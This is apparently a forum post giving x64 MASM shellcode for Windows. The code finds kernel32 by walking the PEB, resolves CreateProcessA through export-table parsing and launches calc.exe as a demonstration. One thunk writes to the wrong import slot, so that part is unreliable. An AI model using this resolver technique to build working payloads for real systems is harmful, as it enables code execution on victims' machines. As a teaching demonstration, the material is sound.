UID 1821
精华 7
积分 2816
威望 69 点
宅币 2195 个
贡献 206 次
宅之契约 0 份
最后登录 2024-5-8
在线时间 490 小时
用户组: 版主
UID 1821
精华 7
威望 69 点
宅币 2195 个
贡献 206 次
宅之契约 0 份
在线时间 490 小时
注册时间 2016-7-12
编译工具 vs或者ddk携带的汇编编译器ml64option casemap:none
;--------------------------------------------------------------------------------
;set name=Shellcode
;ml /c /coff /Cp /Fl /Gd /nologo %name%.asm
;link /SUBSYSTEM:CONSOLE /DEBUG /DEBUGTYPE:CV %name%.obj /OUT:%name%.exe
;PAUSE
;--------------------------------------------------------------------------------
include shellcode.inc
include macro.asm
.code SHELL
jmp _main ;5
_thunk proc
jmp QWORD ptr [rax] ;2
_thunk endp
CreateProcessA proc
call @F ;5
_imp__CreateProcessA QWORD offset _thunk__CreateProcessA ;8
@@:
pop rax ;1
jmp _thunk ;2
CreateProcessA endp
CloseHandle proc
call @F
_imp__CloseHandle QWORD offset _thunk__CloseHandle
@@:
pop rax
jmp _thunk
CloseHandle endp
GetStartupInfo proc
call @F
_imp__GetStartupInfoA QWORD offset _thunk__GetStartupInfo
@@:
pop rax
jmp _thunk
GetStartupInfo endp
_KernelBase proc
mov rax,(_TEB ptr gs:[0]).NtTib.Self
mov rax,(_TEB ptr [rax]).ProcessEnvironmentBlock
mov rax,(_PEB ptr [rax]).Ldr
mov rax,(_PEB_LDR_DATA ptr [rax]).InInitializationOrderModuleList.Flink
mov rdx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD] ;ntdll
mov rax,(_LIST_ENTRY ptr [rax]).Flink
mov rcx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];KERNELBASE
mov rax,(_LIST_ENTRY ptr [rax]).Flink
mov rax,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];kenrl32
ret
_KernelBase endp
_StrLen proc uses rdi rcx
or rcx,-1
mov rdi,rax
xor rax,rax
repne scasb
not rcx
mov rax,rcx
ret
_StrLen endp
_StrCmp proc uses rcx rsi rdi
mov rax,rsi
call _StrLen
mov rcx,rax
mov rax,rdi
call _StrLen
cmp rax,rcx
jnz @F
repe cmpsb
mov rax,rcx
@@:
ret
ret
_StrCmp endp
_GetProcAddress proc uses rsi rdi rbx
mov rsi,rcx
mov ax,(IMAGE_DOS_HEADER ptr [rsi]).e_magic
cmp ax,"ZM"
jz @F
xor rax,rax
jmp done
@@:
mov ebx,(IMAGE_DOS_HEADER ptr [rsi]).e_lfanew
add rbx,rsi
mov eax,(IMAGE_NT_HEADERS ptr [rbx]).Signature
cmp eax,"EP"
jz @F
xor rax,rax
jmp done
@@:
lea rbx,(IMAGE_NT_HEADERS ptr [rbx]).OptionalHeader
mov ax,(_IMAGE_OPTIONAL_HEADER64 ptr [rbx]).Magic
cmp ax,20Bh
jz @F
;PE 32
xor rax,rax
jmp done
@@:
EXP EQU IMAGE_DIRECTORY_ENTRY_EXPORT*SizeOf _IMAGE_DATA_DIRECTORY
mov ebx,(_IMAGE_OPTIONAL_HEADER64 ptr [ebx]).DataDirectory[EXP][_IMAGE_DATA_DIRECTORY.VirtualAddress]
add rbx,rcx
mov r9d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNames
add r9,rcx
xor r8,r8
re:
mov eax,[r9][r8*4]
add rax,rcx
mov si,[rax]
cmp si,[rdx]
jnz @F
mov rsi,rax
mov rdi,rdx
call _StrCmp
or rax,rax
jnz @F
mov edi,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfFunctions
add rdi,rcx
mov eax,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNameOrdinals
add rax,rcx
movzx eax,word ptr [rax][r8*2]
mov eax,[rdi][rax*4]
add rax,rcx
jmp done
@@:
inc r8
cmp r8d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).NumberOfNames
jb re
xor rax,rax
done:
ret
_GetProcAddress endp
_thunk__CreateProcessA proc
push r9
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax
call @F
byte "CreateProcessA",0
@@:
pop rdx
call _GetProcAddress
mov _imp__CreateProcessA,rax
pop rcx
pop rdx
pop r8
pop r9
push rax
ret
_thunk__CreateProcessA endp
_thunk__CloseHandle proc
push r9
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax
call @F
byte "CloseHandle",0
@@:
pop rdx
call _GetProcAddress
mov _imp__CloseHandle,rax
pop rcx
pop rdx
pop r8
pop r9
push rax
ret
_thunk__CloseHandle endp
_thunk__GetStartupInfo proc
push r9
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax
call @F
byte "GetStartupInfoA",0
@@:
pop rdx
call _GetProcAddress
mov _imp__CloseHandle,rax
pop rcx
pop rdx
pop r8
pop r9
push rax
ret
_thunk__GetStartupInfo endp
_main proc uses rdi
@LOCAL _si,STARTUPINFO
@LOCAL _pi,PROCESS_INFORMATION
END_LOCAL QWORD * 10
and (STARTUPINFO ptr _si).cb,0
fastcall CreateProcessA,rcx,0,0,0,0,0,0,0,addr _si,addr _pi
or eax,eax
jz @F
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hThread
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hProcess
@@:
EPILOG
ret
_main endp
.code
WinMainCRTStartup proc
int 3
call @F
byte "calc.exe",0
@@:
pop rcx
int 3
call _main
int 3
ret
WinMainCRTStartup endp
end 复制代码